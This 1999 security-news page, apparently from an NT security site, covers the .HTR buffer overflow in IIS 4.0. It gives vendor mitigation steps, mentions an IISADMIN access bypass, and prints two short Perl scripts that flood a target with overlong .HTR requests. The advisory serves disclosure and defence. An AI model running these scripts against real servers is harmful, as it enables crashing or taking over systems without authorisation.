Home Page NT Security Risks Archive NT Security Tools NT Security Books at ComputerLiteracy.com Contact Information Advertise on This Site Translate This Page

NT SECURITY NEWS  8/3/99

Click Here!

NT SECURITY - .HTR Vulnerability in IIS

.HTR Vulnerability in IIS
Reported June 8,1999 by eEYE Digital Security Team

VERSIONS EFFECTED
  • Internet Information Server 4.0
  • Peer Web Services

DESCRIPTION

IIS is subject to a buffer overflow condition that allows an intruder to gain control of remote machine.
 
According to eEYE's bulletin,
 
"IIS includes the capability to allow Windows NT users to change their password via the web directory /iisadmpwd/. This feature is implemented as a set of .HTR files and the ISAPI extension file ISM.DLL. So somewhere along the line when the URL is passed through to ISM.DLL, proper bounds checking is not done and our overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed by default on IIS4 servers."

It's worthy to note that Peer Web Services is also vulnerable to the overflow condition due to the ISM.DLL. In addition to an overflow condition, the IISADMIN interface may be accessed even when the permissions are set to only allow the localhost to connect. Using a URL similar to /scripts/iisadmin/ism.dll?http/dir will present a logon dialog where an intruder can attempt to brute force guess an account name and password.

DEMONSTRATION CODE

eEYE released some code that demonstrates the exploit. You'll need to compile the code since it's in assembler format. Here's an executable version of the compiled code -- and here are modified versions of netcat -- one of which runs on port 80, and the other on port 99. And here's some C-based exploit code that runs on UNIX-based systems.

In addition, Ryan Permeh published a working PERL-based expliot as follows:

#!/usr/bin/perl
#props to the absu crew
use Net::Telnet;
for ($i=2500;$i<3500;$i++)
{
$obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80);
my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n";
print "$cmd\n";$obj->print("$cmd");
$obj->close;
}

However, Randal Schwartz points out that it can be done another way:

#!/usr/bin/perl
use LWP::Simple;
for ($i = 2500; $i <= 3500; $i++) {
warn "$i\n";
get "http://$ARGV[0]/".('a' x $i).".htr";
}

Greg Hoglund also wrote some nifty C code that shows how to create a package to deliver a payload into the IIS server.

 

VENDOR COMMENTS

Microsoft has released a bulletin regarding this matter, and has subsequently issued a fix for IIS to correct the problem. Be sure to read Support Online articles Q234905.

You can also modify the properties of your IIS system to minimize the vulnerability.

Microsoft highly recommends that customers disable the script mapping for .HTR files as follows:

From the desktop, start the Internet Service Manager by clicking Start | Programs | Windows NT 4.0 Option Pack | Microsoft Internet Information Server | Internet Service Manager

* Double-click "Internet Information Server"
* Right-click on the computer name and select Properties
* In the Master Properties drop-down box, select "WWW Service", then click the "Edit" button .
* Click the "Home Directory" tab, then click the "Configuration"button .
* Highlight the line in the extension mappings that contains ".HTR", then click the "Remove" button.
* Respond "yes" to "Remove selected script mapping?" say yes, click OK 3 times, close ISM

CREDITS
Discovered by eEYE Digital Security Team
Posted here at The NT Shop on June 22, 1999


WebTrends Security Analyzer!

Copyright (c) 1995-1999, M.E. - ALL RIGHTS RESERVED
Unauthorized duplication expressly prohibited
LINK TO THIS PAGE INSTEAD OF VIOLATING OUR COPYRIGHT